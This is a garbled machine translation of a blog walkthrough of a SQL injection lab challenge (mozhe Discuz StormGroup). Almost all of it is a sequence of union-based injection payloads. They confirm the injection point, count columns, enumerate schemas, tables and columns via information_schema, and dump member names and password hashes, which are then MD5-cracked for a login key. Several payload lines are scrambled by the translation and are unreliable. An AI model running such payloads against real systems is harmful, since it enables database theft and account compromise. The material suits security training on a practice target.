Verbatim https://www.dazhuanlan.com/2019/08/25/5d62593d1d0a1/
Visit a web page, scroll to enter the bottom of the landing announcement, the test injection point
? Id = 1 and 1 = 1 returns to normal,? Id = 1 and 1 = 2 returns an error, indicating the injection point. 
? id = 1 order number by 5 query column. Has been reduced, until the page returns to normal 
? Id = 1 and 1 = 2 union select 1, version (), database (), 4 version of the query and the database name
(this time to know the database is mozhe_Discuz_StormGroup)
? The above mentioned id = 1 and 1 = 2 of Union select 1, schema_name, 3,4 from information_schema.schemata limit 0,1 query the database using limit0,1 1 indicates the start line fetch data from the 0th row. 
? id = 1 and 1 = 2 union select 1, schema_name, 3,4 from information_schema.schemata limit 1,1 query the database using a fetch limit 1,1 indicates the start line data from the first row. 
? id = 1 and 1 = 2 union select 1, schema_name, 3,4 from information_schema.schemata limit 2,1 query the database using a fetch limit 2,1 indicates the start line data from the second line. 
? id = 1 and 1 = 2 union select 1, schema_name, 3,4 from information_schema.schemata limit 3,1 query the database using limit 3,1 indicates the start line 31 taken from line data.
? id = 1 and 1 = 2 union select 1, schema_name, 3,4 from information_schema.schemata limit 4,1 query the database, using the fetch limit 4,1 indicates the start line data from line 1 4. 
? id = 1 and 1 = 2 union select 1, table_name, 3,4 from information_schema.tables where table_schema = 'mozhe_Discuz_StormGroup' name table limit 0,1 mozhe_Discuz_StormGroup database queries, fetches a row of data from line 0
(at this time know the database table StromGroup_member)
? the above mentioned id = 1 and 1 = 2 the SELECT of Union 1, table_name, 3, 4 from the WHERE information_schema.tables table_schema = 'mozhe_Discuz_StormGroup' limit 1, 1 query table name mozhe_Discuz_StormGroup database, from the first line fetches a row of data 
? id = 1 and 1 = 2 union select 1, table_name, 3,4 from information_schema.tables where table_schema = 'mozhe_Discuz_StormGroup' limit query name 2,1 mozhe_Discuz_StormGroup database table, fetches a row from the second row data, an error is returned, indicating that only two tables.
? id = 1 and 1 = 2 union select 1, the field contents column_name, column_type, 4 from information_schema.columns where table_name = 'StormGroup_member' limit 0,1 StormGroup_member query table, fetches a row of data from line 0 
? id = 1 and 1 = 2 union select 1, column_name, column_type, 4 from information_schema.columns where table_name = 'StormGroup_member' field contents limit 1,1 StormGroup_member query table, fetches a row of data from the first row. 1 
? =. 1 and ID = 2. 1 union select 1, column_name, column_type, 4 from information_schema.columns where table_name = 'StormGroup_member' limit field contents StormGroup_member 2,1 query table, a row of data taken from line 2 
? =. 1 and ID = 2. 1. 1 SELECT Union, column_name, column_type, 4 from information_schema.columns where table_name = 'StormGroup_member' limit field contents StormGroup_member 3,1 query table, fetches a row of data from the third row
? id = 1 and 1 = 2 union select 1, concat (name, '-', password, '-', status), 3,4 from mozhe_Discuz_StormGroup.StormGroup_member limit 0,1 acquires the 0th row value 
id = 1 and? 1 = 2 union select 1, concat (name, '-', password, '-', status), 3,4 from mozhe_Discuz_StormGroup.StormGroup_member limit 1,1 acquiring first row value 
md5 decrypted, to obtain login key.
